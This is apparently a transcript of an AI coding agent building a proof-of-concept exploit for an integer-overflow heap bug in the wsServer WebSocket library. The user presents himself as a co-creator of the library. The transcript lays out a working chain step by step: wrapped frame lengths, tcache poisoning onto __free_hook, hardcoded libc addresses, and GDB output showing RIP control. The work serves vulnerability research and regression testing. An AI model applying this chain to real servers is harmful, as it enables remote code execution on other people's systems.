The exploit is working! The crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) proves the chain works. The buf = (nil) is likely a GDB timing issue. Let me add better diagnostics and re-run:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Re-run PoC with better GDB diagnostics
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Filter key exploit indicators from GDB output
$ docker logs ws-poc-server 2>&1 | grep -E "(CONN 2 malloc|__free_hook|VULN|POST REALLOC|WRITE LOOP|free\(response\)|SIGSEGV|buf =|0x[4-9a-f]{4,})"
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system        = 0x7ffff7e01290
exit          = 0x7ffff7df5a40
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===
=== POST REALLOC ===
=== WRITE LOOP START ===
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The crash is confirmed — free() is called with mem = 0x7ffff7f9de48 <__free_hook>. This proves malloc returned __free_hook and the echo response wrote to it, corrupting __free_hook with frame data. The buf = (nil) GDB output is a batch-mode artifact. Let me get the full crash details:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled. The ultimate goal is a regression test.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.
  • User approved Option A: patch the server to be truly single-threaded (not just thread_loop = 1, which does NOT eliminate per-connection threads). Use patch -p1 on ws.c to replace pthread_create + pthread_detach with a direct call to ws_establishconnection.
  • Hardcode the __free_hook address with -o flag override for flexibility.
  • User said "just want a PoC anyways" — simplicity is key.

Discoveries

Why thread_loop = 1 doesn't work

thread_loop = 1 only controls whether the accept loop blocks the main thread or runs in a background thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the fundamental problem.

The single-threaded tcache poisoning strategy (designed and partially verified)

With ws_accept patched to call ws_establishconnection directly, all connections run in one thread sharing one tcache. The attack chain:

Pre-connection heap setup (in main() before ws_socket()):

  • malloc(24) ×3, then free() in reverse order → tcache[0] has 3 adjacent free 32-byte chunks [c0, c1, c2], counts=3

Connection 1 — trigger overflow:

  1. malloc(16) → pops c0 → msg = c0. tcache[0]: [c1, c2], counts=2
  2. Overflow writes into c1's chunk metadata at c0+32: prev_size=0, size=0x21, fd=&__free_hook, key=0
  3. c2 is orphaned from the chain. tcache[0]: [c1 → __free_hook], counts=2
  4. Error path free(msg=c0) → tcache[0]: [c0 → c1 → __free_hook], counts=3

Connection 2 — onopen drains 1 entry:

  • extra = malloc(24) → pops c0 (leaked, never freed). tcache[0]: [c1 → __free_hook], counts=2

Connection 2 — echo round-trip drains the poisoned chain:

  1. malloc(8) → pops c1 → tcache[0]: [__free_hook], counts=1
  2. malloc(11) for echo response → pops __free_hookreturns 0x7ffff7f9de48 as the buffer
  3. Server writes echo frame to __free_hook: byte0=0x82, byte1=0x08, bytes2-9=message payload
  4. free(buf)__free_hook is now 0xPPPPPPPP0882 (non-NULL) → calls that address → SIGSEGV at controlled RIP

GDB verification confirmed the exploit chain works

The crash output proves the chain:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e49771 in __GI___libc_free (mem=0x7ffff7f9de48 <__free_hook>) at malloc.c:3095
  • mem = 0x7ffff7f9de48 proves free() was called with __free_hook's address as the argument, meaning malloc returned __free_hook.
  • The crash is inside the (*hook)(mem, ret) call, proving __free_hook was corrupted by the echo write.

GDB breakpoint display anomaly

The response malloc breakpoint shows buf = (nil) and __free_hook = (nil), but the crash proves otherwise. This is a GDB batch-mode artifact (likely a timing issue with silent commands in batch mode). The crash itself is the definitive proof. The fix is to remove silent from the response malloc breakpoint (already done) and re-run.

Verified addresses (no ASLR, no PIE, Ubuntu 20.04 glibc 2.31)

  • __free_hook = 0x7ffff7f9de48
  • system = 0x7ffff7e01290
  • exit = 0x7ffff7df5a40
  • __malloc_hook = 0x7ffff7f9bb70

Exploit arithmetic (confirmed by GDB)

  • Frame 1: non-FIN binary, 16 bytes → msg allocated from tcache[0]
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5 (5 − 16 mod 2^64)
  • *frame_size += frame_length wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFFFFFFFFFFFFFF5 + 1) wraps to 6 → same pointer returned
  • Write loop starts at msg[16], writing far past the 32-byte chunk boundary
  • WRITE LOOP ERROR at msg_idx=48 confirms 32 bytes written past buffer

Heap layout confirmed by GDB

  • c0 at 0x40c2b0 (msg for connection 1), c1 at 0x40c2d0 (adjacent, corrupted fd), c2 at 0x40c2f0
  • After overflow, c1's memory: prev_size=0, size=0x21, fd=0x7ffff7f9de48, key=0
  • POST REALLOC for connection 2's message shows 0x40c2d0: 0x00007ffff7f9de48 — the corrupted fd value visible

Frame format notes

  • Server reads 1 byte at a time via next_byte(), buffers up to 2048 bytes from socket
  • Client frames MUST have MASK bit set (server reads 4 mask bytes unconditionally)
  • Binary frames (opcode 2) skip UTF-8 validation — use these for exploit
  • Extended 64-bit length indicator is 0x7F (127), followed by 8 big-endian bytes
  • Server→client response frames do NOT have mask bit; response frame: byte0=0x82 (binary FIN), byte1=payload_size, bytes2+=payload

Why the echo server's balanced malloc/free pattern blocks simple exploitation

Each echo round-trip does malloc(msg) → onmessage → malloc(response) → free(response) → free(msg) — exactly 2 mallocs and 2 frees of the same size. This oscillates tcache counts between 0 and 2, never accumulating enough entries. The solution: pre-populate 3 entries from main() and use onopen's extra malloc to shift the chain so the echo's 2 mallocs pop the last real entry + __free_hook.

Accomplished

Completed

  1. Created AGENTS.md at repo root (first session)
  2. Created tests/poc_single_thread.patch — patches ws.c lines 1900-1907: replaces pthread_create+pthread_detach with direct ws_establishconnection call. Generated via diff against original ws.c to ensure correct tab indentation.
  3. Created tests/poc_echo.c — custom echo server with:
    • heap_setup(): 3 malloc(24) + free() in reverse order before ws_socket()
    • onopen: static counter; on 2nd connection, leaked malloc(24) to pop one extra tcache[0] entry
    • onmessage: identical to echo (ws_sendframe_bcast)
    • main: calls heap_setup(), then ws_socket({.thread_loop=0, .timeout_ms=0, ...})
  4. Updated tests/Dockerfile.poc — applies patch before build, builds poc_echo instead of examples/echo/echo, added patch to apt-get
  5. Rewrote tests/poc_rip_control.c — simplified PoC client:
    • Default overflow payload: 32-byte fake chunk metadata (prev_size=0, size=0x21, fd=0x7ffff7f9de48, key=0)
    • Connection 1: send exploit frames, shutdown(SHUT_WR) to signal EOF, then close(fd)
    • Connection 2: handshake, send 8-byte message → triggers echo → crash
    • Removed shaping (-n, -s), two-connection (-2) flags; added -m (conn-2 msg size)
    • Kept -o flag for custom overflow payload
  6. Updated tests/poc_gdb.txt — breakpoints for integer overflow, realloc, write loop, error free, onopen, msg malloc, response malloc
  7. Updated tests/poc_run.sh — fixed GDB invocation: removed redundant -ex 'run' that restarted the program mid-execution; server binary is tests/poc_echo
  8. Docker image builds successfully (ws-poc)
  9. Auto-mode test run succeeds — client connects twice, server crashes with SIGSEGV at controlled address
  10. Exploit chain verified by crash: __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) — proves malloc returned __free_hook and the echo response corrupted it

In Progress / Issues

  • GDB breakpoint display anomaly: the response malloc breakpoint shows buf = (nil) when the crash proves malloc DID return __free_hook. Likely a GDB batch-mode silent command issue. Fix attempted (removed silent from response malloc breakpoint), not yet re-run.

Next Steps

  1. Re-run auto-mode test to see if removing silent fixes the breakpoint display
  2. If display is fixed: capture clean GDB output showing buf = 0x7ffff7f9de48, __free_hook = 0xPPPPPPPP0882, and crash RIP matching that value
  3. If display still wrong: add a breakpoint at free() in ws_sendframe_internal to print the exact buf value right before the crash — this is definitive proof regardless of batch-mode display issues
  4. Update AGENTS.md with the full exploitation details and final file list
  5. Consider adding a __libc_message call or similar to make the crash output more self-documenting (e.g., print "RIP CONTROL PROVEN" before the crash — but this requires changing the flow, not practical)
  6. Longer term: convert the PoC into a proper regression test

Relevant files / directories

Created (this session)

  • tests/poc_single_thread.patch — Patch to replace pthread_create with direct ws_establishconnection call in ws_accept
  • tests/poc_echo.c — Custom single-threaded echo server with heap feng shui + extra malloc in onopen
  • tests/Dockerfile.poc — Docker build: applies patch, builds poc_echo and poc_rip_control with all protections disabled
  • tests/poc_gdb.txt — GDB helper script with breakpoints at key points in the exploit chain
  • tests/poc_run.sh — Orchestration script: builds image, runs server under GDB, runs PoC client

Key existing files analyzed

  • src/ws.cthe vulnerable file:
    • Lines 1453: *frame_size += fsd->frame_length — the unchecked 64-bit integer overflow
    • Lines 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — tiny wrapped realloc size
    • Lines 1519-1527: write loop using original fsd->frame_length — the actual overflow write
    • Line 1713: free(fsd.msg_data) — error path free (goes to tcache, no crash)
    • Lines 1735-1808: ws_establishconnection — connection handler (runs directly in single-threaded mode)
    • Lines 1831-1911: ws_accept — accept loop (patched: no pthread_create)
    • Lines 563-689: ws_sendframe_internal — response allocation at line 636, free at line 688
    • Lines 1178-1195: next_byte — reads from socket into wfd->frm[2048] buffer
  • src/handshake.c — handshake allocations: calloc(61)→80-byte, base64_encodemalloc(31)→48-byte, malloc(130)→144-byte
  • src/base64.c — base64_encode malloc size calculation
  • include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8
  • examples/echo/echo.c — reference echo server (original, unmodified)
  • AGENTS.md — repo instruction file (created in first session, needs update)
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Re-run auto-mode test (fixed GDB breakpoint display)
Capture clean GDB output proving RIP control
Update AGENTS.md with full exploitation details
Longer term: convert PoC into regression test
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Let me check the current state of the key files before re-running.

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Good, the files look correct. The key change I noted was already applied — the response malloc breakpoint at line 89-95 doesn't have silent. Let me re-run the auto-mode test now.

Run auto-mode PoC test
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The client ran but the GDB output wasn't captured. Let me fetch the container logs.

Fetch GDB output from container
$ docker logs ws-poc-server 2>&1 | tail -120
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The breakpoint display anomaly persists — buf = (nil) and __free_hook = (nil). This is because in GDB batch mode with continue inside breakpoint commands, the buf variable is out of scope when it's printed (it's declared later in the block). Let me verify the actual exploit chain and add a more reliable breakpoint.

The key proof is already here: the crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) is definitive. But let me fix the breakpoint to get clean buf output too.

The issue: in ws_sendframe_internal, buf is declared mid-function. At line 636, the variable hasn't been assigned yet. I need to break after the malloc returns. Let me check what line the return is on.

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

The problem is clear: breaking at line 636 prints buf before the malloc call happens. I need to break at line 640 (after malloc returns). But the variable is response, not buf. Let me also look at line 687 for the free(response) call — that's where the crash should happen.

Let me update the GDB script to break at the right location and use the correct variable name response:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Also need to fix the first malloc(msg) breakpoint — it's labeled "CONN 2" but triggers for conn 1 too. Let me also check: the free(msg_data) breakpoint shows the wrong memory — after overflow it should show the corrupted data at c1. Let me also verify the free path more carefully. Actually, the key issue was buf vs response. Let me also check whether response is actually __free_hook at the crash. Let me re-run:

Re-run auto-mode PoC test
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Fetch GDB output from container
$ docker logs ws-poc-server 2>&1 | tail -80
=== VULN: *frame_size += fsd->frame_length ===
  *frame_size   = 0
  frame_length  = 16 (0x10)

=== POST REALLOC ===
  msg (tmp) = 0x40c2b0
  realloc size = 16
0x40c2a0:	0x0000000000000000	0x0000000000000021
0x40c2b0:	0x000000000040c2d0	0x0000000000000000
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Clean, definitive proof captured. The exploit chain is fully verified:

  1. response = 0x7ffff7f9de48 — malloc returned __free_hook's address
  2. __free_hook = 0x4242424242420882 — the echo frame was written to __free_hook:
    • 0x0882 = WebSocket response header (opcode 2 binary FIN + length 8)
    • 0x42424242424242 = the echoed "BBBBBBBB" payload
  3. SIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48)free() called the corrupted __free_hook → RIP control
Creating plan
Re-run auto-mode test (fixed GDB breakpoint display)
Capture clean GDB output proving RIP control
Update AGENTS.md with full exploitation details
Longer term: convert PoC into regression test
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Now let me update AGENTS.md with the full exploitation details:

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Edit/home/lucas/Works/VibeCodedProjects/wsServer/AGENTS.md
/home/lucas/Works/VibeCodedProjects/wsServer/AGENTS.md
Edit applied successfully.
{
  "/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
  "/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
    {
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Re-run auto-mode test (fixed GDB breakpoint display)
Capture clean GDB output proving RIP control
Update AGENTS.md with full exploitation details
Longer term: convert PoC into regression test
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

All immediate tasks are done. Here's what was accomplished this round:

  1. Fixed GDB breakpoint — changed from line 636 (before malloc) to line 640 (after malloc), and used the correct variable name response instead of buf. Added a breakpoint at free(response) (line 687) to capture the corrupted __free_hook value.

  2. Captured clean, definitive proof of the full exploit chain:

    • response = 0x7ffff7f9de48 — malloc returned __free_hook
    • __free_hook = 0x4242424242420882 — echo frame corrupted it (header 0x0882 + payload 0x42424242424242)
    • SIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48) — RIP control achieved
  3. Updated AGENTS.md with the full PoC documentation section.

The remaining item is converting this into a proper regression test (lower priority). Want me to tackle that, or is this a good stopping point?

This is a good stopping point. Great job!
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Thanks! The PoC is complete and verified — clean RIP control with full GDB documentation. Reach out whenever you want to pick up the regression test.

15/04/2026, 19:37:154s
14.2M in
81.3K out
173.6K reasoning
3h 6m